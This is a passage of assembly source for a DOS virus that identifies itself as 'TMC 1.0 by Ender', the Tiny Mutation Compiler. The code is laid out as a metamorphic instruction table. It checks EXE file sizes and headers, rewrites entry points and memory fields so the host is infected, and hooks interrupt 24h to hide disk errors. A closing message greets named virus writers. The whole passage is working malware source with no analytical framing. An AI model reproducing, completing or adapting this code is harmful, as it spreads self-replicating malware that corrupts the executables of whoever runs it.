infect_exit db 11101110b ; Beginning of block
dw 1771h ; Block identification of infect_exit
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13a5h ; Pointer to int24_load
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0fbh ; Pointer to infect_exit_
db 11101111b ; End of block
infect_exit_ db 11101110b ; Beginning of block
dw 0fbh ; Block identification of infect_e...
db 01h ; One byte instruction
ret ; Return
db 11101111b ; End of block
infect_exe db 11101110b ; Beginning of block
dw 138dh ; Block identification of infect_exe
db 01h ; One byte instruction
inc cx ; EXE executable
db 04h ; Four bytes instruction
mov ds:[1234h],cl ; Store executable status
db 11101101b ; Data reference
dw 1388h ; Pointer to executa_sta
db 02h ; Two bytes instruction
or dx,dx ; Too small in filesize?
db 01110101b+10000000b ; Not zero? Jump to exam_filesiz
dw 13aeh ; Pointer to exam_filesiz
db 03h ; Three bytes instruction
cmp ax,2710h ; Too small in filesize?
db 01110010b+10000000b ; Below? Jump to close_file
dw 0fah ; Pointer to close_file
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 13aeh ; Pointer to exam_filesiz
db 11101111b ; End of block
exam_filesiz db 11101110b ; Beginning of block
dw 13aeh ; Block identification of exam_fil...
db 03h ; Three bytes instruction
cmp dx,06h ; Too large in filesize?
db 01110111b+10000000b ; Above? Jump to close_file
dw 0fah ; Pointer to close_file
db 01h ; One byte instruction
push ax ; Save AX at stack
db 01h ; One byte instruction
push dx ; Save DX at stack
db 03h ; Three bytes instruction
mov cx,200h ; Divide by pages
db 02h ; Two bytes instruction
div cx ; DX:AX = filesize in pages
db 01h ; One byte instruction
inc ax ; Increase total number of 512-byt...
db 03h ; Three bytes instruction
cmp [si+04h],ax ; Internal overlay?
db 01h ; One byte instruction
pop dx ; Load DX from stack
db 01h ; One byte instruction
pop ax ; Load AX from stack
db 01110101b+10000000b ; Not equal? Jump to close_file
dw 0fah ; Pointer to close_file
db 01h ; One byte instruction
push ax ; Save AX at stack
db 01h ; One byte instruction
push dx ; Save DX at stack
db 02h ; Two bytes instruction
xor ax,ax ; Zero AX
db 04h ; Four bytes instruction
cmp [si+0ch],0ffffh ; Maximum paragraphs to allocate ...?
db 01110100b+10000000b ; Equal? Jump to maximum_mem
dw 1399h ; Pointer to maximum_mem
db 03h ; Three bytes instruction
mov ax,[si+04h] ; AX = total number of 512-byte pa...
db 01h ; One byte instruction
inc ax ; Increase total number of 512-byt...
db 02h ; Two bytes instruction
mov cl,05h ; Divide by thirty-two
db 02h ; Two bytes instruction
shl ax,cl ; AX = total number of 512-byte pa...
db 03h ; Three bytes instruction
sub ax,[si+08h] ; Subtract header size in paragrap...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 1399h ; Pointer to maximum_mem
db 11101111b ; End of block
maximum_mem db 11101110b ; Beginning of block
dw 1399h ; Block identification of maximum_mem
db 03h ; Three bytes instruction
add ax,[si+0ch] ; Add maximum paragraphs to alloca...
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store size of memory block in pa...
db 11101101b ; Data reference
dw 1395h ; Pointer to mcb_size__
db 03h ; Three bytes instruction
mov ax,[si+0eh] ; AX = initial SS relative to star...
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store initial SS relative to sta...
db 11101101b ; Data reference
dw 138ah ; Pointer to initial_ss_
db 03h ; Three bytes instruction
mov ax,[si+10h] ; AX = initial SP
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store initial SP
db 11101101b ; Data reference
dw 138ch ; Pointer to initial_sp_
db 03h ; Three bytes instruction
mov ax,[si+14h] ; AX = initial IP
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store initial IP
db 11101101b ; Data reference
dw 138bh ; Pointer to initial IP
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store initial IP
db 11101101b ; Data reference
dw 1773h ; Pointer to incorrec_ip
db 03h ; Three bytes instruction
mov ax,[si+16h] ; AX = initial CS relative to star...
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store initial CS relative to sta...
db 11101101b ; Data reference
dw 1389h ; Pointer to initial_cs_
db 01h ; One byte instruction
pop dx ; Load DX from stack
db 01h ; One byte instruction
pop ax ; Load AX from stack
db 01h ; One byte instruction
push ax ; Save AX at stack
db 01h ; One byte instruction
push dx ; Save DX at stack
db 05h ; Five bytes instruction
mov [si+0ch],0ffffh ; Store maximum paragraphs to allo...
db 05h ; Five bytes instruction
mov [si+10h],7ffeh ; Store initial SP
db 05h ; Five bytes instruction
mov word ptr [si+14h],00h
db 03h ; Three bytes instruction
mov cx,10h ; Divide by paragraphs
db 02h ; Two bytes instruction
div cx ; DX:AX = filesize in paragraphs
db 03h ; Three bytes instruction
sub ax,[si+08h] ; Subtract header size in paragrap...
db 01h ; One byte instruction
inc ax ; Increase initial CS/SS relative ...
db 03h ; Three bytes instruction
mov [si+0eh],ax ; Store initial SS relative to sta...
db 03h ; Three bytes instruction
mov [si+16h],ax ; Store initial CS relative to sta...
db 03h ; Three bytes instruction
mov ax,[si+04h] ; AX = total number of 512-byte pa...
db 01h ; One byte instruction
inc ax ; Increase total number of 512-byt...
db 02h ; Two bytes instruction
mov cl,05h ; Divide by thirty-two
db 02h ; Two bytes instruction
shl ax,cl ; AX = total number of 512-byte pa...
db 03h ; Three bytes instruction
sub ax,[si+08h] ; Subtract header size in paragrap...
db 03h ; Three bytes instruction
add ax,[si+0ah] ; Add maximum paragraphs to alloca...
db 02h ; Two bytes instruction
mov di,ax ; DI = minimum paragraphs to alloc...
db 01h ; One byte instruction
pop cx ; Load CX from stack (DX)
db 01h ; One byte instruction
pop dx ; Load DX from stack (AX)
db 03h ; Three bytes instruction
and dx,1111111111110000b
db 03h ; Three bytes instruction
add dx,10h ; DX = low-order word of offset fr...
db 03h ; Three bytes instruction
adc cx,00h ; CX = high-order word of offset f...
db 03h ; Three bytes instruction
mov ax,4200h ; Set current file position (SOF)
db 02h ; Two bytes instruction
int 21h
db 03h ; Three bytes instruction
add ax,1234h ; AX = length of virus
db 11101101b ; Data reference
dw 66h ; Pointer to virus_end
db 03h ; Three bytes instruction
adc dx,00h ; Convert to 32-bit
db 03h ; Three bytes instruction
mov cx,200h ; Divide by pages
db 02h ; Two bytes instruction
div cx ; DX:AX = filesize in pages
db 03h ; Three bytes instruction
mov [si+02h],dx ; Store number of bytes in last 51...
db 03h ; Three bytes instruction
add dx,0ffffh ; Add sixty-five thousand five hun...
db 03h ; Three bytes instruction
adc ax,00h ; Convert to 32-bit
db 03h ; Three bytes instruction
mov [si+04h],ax ; Store total number of 512-byte p...
db 05h ; Five bytes instruction
mov [si+0ah],800h ; Store minimum paragraphs of memo...
db 01h ; One byte instruction
inc ax ; Store total number of 512-byte p...
db 02h ; Two bytes instruction
mov cl,05h ; Divide by thirty-two
db 02h ; Two bytes instruction
shl ax,cl ; AX = total number of 512-byte pa...
db 03h ; Three bytes instruction
sub ax,[si+08h] ; Subtract header size in paragrap...
db 03h ; Three bytes instruction
add ax,[si+0ah] ; Add maximum paragraphs to alloca...
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store new size in paragraphs
db 11101101b ; Data reference
dw 1393h ; Pointer to new_mcb_siz
db 02h ; Two bytes instruction
sub di,ax ; DI = additional minimum paragrap...
db 01110110b+10000000b ; Below or equal? Jump to dont_add...
dw 1396h ; Pointer to dont_add_mem
db 03h ; Three bytes instruction
add [si+0ah],di ; Add additional minimum paragraph...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 1396h ; Pointer to dont_add_mem
db 11101111b ; End of block
dont_add_mem db 11101110b ; Beginning of block
dw 1396h ; Block identification of dont_add...
db 03h ; Three bytes instruction
mov ax,14h ; AX = probability of storing inco...
db 04h ; Four bytes instruction
cmp ds:[1234h],ax ; Store incorrect IP?
db 11101101b ; Data reference
dw 0bech ; Pointer to probability_
db 03h ; Three bytes instruction
mov ax,00h ; ADD [BX+SI],AL (opcode 00h,00h)
db 01110111b+10000000b ; Above? Jump to write_virus
dw 138eh ; Pointer to write_virus
db 03h ; Three bytes instruction
mov bp,10h ; Random number within sixteen
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0bd5h ; Pointer to rnd_in_rang
db 02h ; Two bytes instruction
sub al,08h ; Subtract eight from random number
db 03h ; Three bytes instruction
mov di,1234h ; DI = offset of incorrec_ip
db 11101101b ; Data reference
dw 1773h ; Pointer to incorrec_ip
db 03h ; Three bytes instruction
add [di+01h],al ; Add random number to incorrect IP
db 06h ; Six bytes instruction
mov ds:[00h],1110110100110011b
db 03h ; Three bytes instruction
mov ax,1001000010010000b
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 138eh ; Pointer to write_virus
db 11101111b ; End of block
int24_virus db 11101110b ; Beginning of block
dw 1770h ; Block identification of int24_virus
db 02h ; Two bytes instruction
mov al,03h ; Fail system call in progress
db 01h ; One byte instruction
iret ; Interrupt return
db 11101111b ; End of block
int24_store db 11101110b ; Beginning of block
dw 13a4h ; Block identification of int24_store
db 01h ; One byte instruction
push dx ; Save DX at stack
db 01h ; One byte instruction
push ds ; Save DS at stack
db 01h ; One byte instruction
push es ; Save ES at stack
db 01h ; One byte instruction
push cs ; Save CS at stack
db 01h ; One byte instruction
pop ds ; Load DS from stack (CS)
db 03h ; Three bytes instruction
mov ax,3524h ; Get interrupt vector 24h
db 02h ; Two bytes instruction
int 21h
db 04h ; Four bytes instruction
mov ds:[1234h],es ; Store segment of interrupt 24h
db 11101101b ; Data reference
dw 13a2h ; Pointer to int24_seg
db 04h ; Four bytes instruction
mov ds:[1234h],bx ; Store offset of interrupt 24h
db 11101101b ; Data reference
dw 13a3h ; Pointer to int24_off
db 03h ; Three bytes instruction
mov dx,1234h ; DX = offset of int24_virus
db 11101101b ; Data reference
dw 1770h ; Pointer to int24_virus
db 03h ; Three bytes instruction
mov ax,2524h ; Set interrupt vector 24h
db 02h ; Two bytes instruction
int 21h
db 01h ; One byte instruction
pop es ; Load ES from stack
db 01h ; One byte instruction
pop ds ; Load DS from stack
db 01h ; One byte instruction
pop dx ; Load DX from stack
db 01h ; One byte instruction
ret ; Return
db 11101111b ; End of block
int24_load db 11101110b ; Beginning of block
dw 13a5h ; Block identification of int24_load
db 01h ; One byte instruction
push ds ; Save DS at stack
db 05h ; Five bytes instruction
mov dx,cs:[1234h] ; DX = offset of interrupt 24h
db 11101101b ; Data reference
dw 13a3h ; Pointer to int24_off
db 05h ; Five bytes instruction
mov ds,cs:[1234h] ; DS = segment of interrupt 24h
db 11101101b ; Data reference
dw 13a2h ; Pointer to int24_seg
db 03h ; Three bytes instruction
mov ax,2524h ; Set interrupt vector 24h
db 02h ; Two bytes instruction
int 21h
db 01h ; One byte instruction
pop ds ; Load DS from stack
db 01h ; One byte instruction
ret ; Return
db 11101111b ; End of block
push_regs db 11101110b ; Beginning of block
dw 13a0h ; Block identification of push_regs
db 05h ; Five bytes instruction
pop cs:[1234h] ; Load 16-bit immediate from stack
db 11101101b ; Data reference
dw 13aah ; Pointer to imm16
db 01h ; One byte instruction
push ax ; Save AX at stack
db 01h ; One byte instruction
push bx ; Save BX at stack
db 01h ; One byte instruction
push cx ; Save CX at stack
db 01h ; One byte instruction
push dx ; Save DX at stack
db 01h ; One byte instruction
push si ; Save SI at stack
db 01h ; One byte instruction
push di ; Save DI at stack
db 01h ; One byte instruction
push bp ; Save BP at stack
db 01h ; One byte instruction
push ds ; Save DS at stack
db 01h ; One byte instruction
push es ; Save ES at stack
db 05h ; Five bytes instruction
jmp cs:[1234h]
db 11101101b ; Data reference
dw 13aah ; Pointer to imm16
db 11101111b ; End of block
pop_regs db 11101110b ; Beginning of block
dw 13a1h ; Block identification of pop_regs
db 05h ; Five bytes instruction
pop cs:[1234h] ; Load 16-bit immediate from stack
db 11101101b ; Data reference
dw 13aah ; Pointer to imm16
db 01h ; One byte instruction
pop es ; Load ES from stack
db 01h ; One byte instruction
pop ds ; Load DS from stack
db 01h ; One byte instruction
pop bp ; Load BP from stack
db 01h ; One byte instruction
pop di ; Load DI from stack
db 01h ; One byte instruction
pop si ; Load SI from stack
db 01h ; One byte instruction
pop dx ; Load DX from stack
db 01h ; One byte instruction
pop cx ; Load CX from stack
db 01h ; One byte instruction
pop bx ; Load BX from stack
db 01h ; One byte instruction
pop ax ; Load AX from stack
db 05h ; Five bytes instruction
jmp cs:[1234h]
db 11101101b ; Data reference
dw 13aah ; Pointer to imm16
db 11101111b ; End of block
int21_addr db 11101110b ; Beginning of block
dw 0c9h ; Block identification of int21_addr
db 04h+10h ; Four bytes data
dd 00h ; Address of interrupt 21h
db 11101111b ; End of block
int21_seg db 11101110b ; Beginning of block
dw 13a2h ; Block identification of int24_seg
db 02h+10h ; Two bytes data
dw 00h ; Segment of interrupt 24h
db 11101111b ; End of block
int21_off db 11101110b ; Beginning of block
dw 13a3h ; Block identification of int24_off
db 02h+10h ; Two bytes data
dw 00h ; Offset of interrupt 24h
db 11101111b ; End of block
imm16 db 11101110b ; Beginning of block
dw 13aah ; Block identification of imm16
db 02h+10h ; Two bytes data
dw 00h ; 16-bit immediate
db 11101111b ; End of block
exe_header db 11101110b ; Beginning of block
dw 138fh ; Block identification of exe_header
db 18h+10h ; Twenty-four bytes data
db 18h dup(00h) ; EXE header
db 11101111b ; End of block
timer_ticks db 11101110b ; Beginning of block
dw 13adh ; Block identification of timer_ticks
db 02h+10h ; Two bytes data
dw 00h ; Timer ticks since midnight
db 11101111b ; End of block
file_time db 11101110b ; Beginning of block
dw 12ch ; Block identification of file_time
db 02h+10h ; Two bytes data
dw 00h ; File time
db 11101111b ; End of block
file_date db 11101110b ; Beginning of block
dw 12dh ; Block identification of file_date
db 02h+10h ; Two bytes data
dw 00h ; File date
db 11101111b ; End of block
progra_seg db 11101110b ; Beginning of block
dw 139fh ; Block identification of progra_seg
db 02h+10h ; Two bytes data
dw 00h ; Segment of PSP for current process
db 11101111b ; End of block
file_handle db 11101110b ; Beginning of block
dw 139dh ; Block identification of file_handle
db 02h+10h ; Two bytes data
dw 00h ; File handle
db 11101111b ; End of block
filename db 11101110b ; Beginning of block
dw 139eh ; Block identification of filename
db (filena_end-filena_begin)+10h
db 07h dup(00h,01h,02h,03h,04h,05h,06h,07h,08h,09h,0ah)
db 11101111b ; End of block
message db 11101110b ; Beginning of block
dw 2328h ; Block identification of message
db (message_end-messag_begin)+10h
messag_begin db 0dh,0ah
db 0dh,0ah
db '<27> TMC 1.0 by Ender <20>',0dh,0ah
db 'Welcome to the Tiny Mutation Compiler!',0dh,0ah
db 'Dis is level 6*9.',0dh,0ah
db 'Greetings to virus makers: Dark Avenger, Vyvojar, SVL, Hell Angel',0dh,0ah
db 'Personal greetings: K. K., Dark Punisher',0dh,0ah
db 0dh,0ah
db 11101111b ; End of block
db 00h ; End of table
end code_begin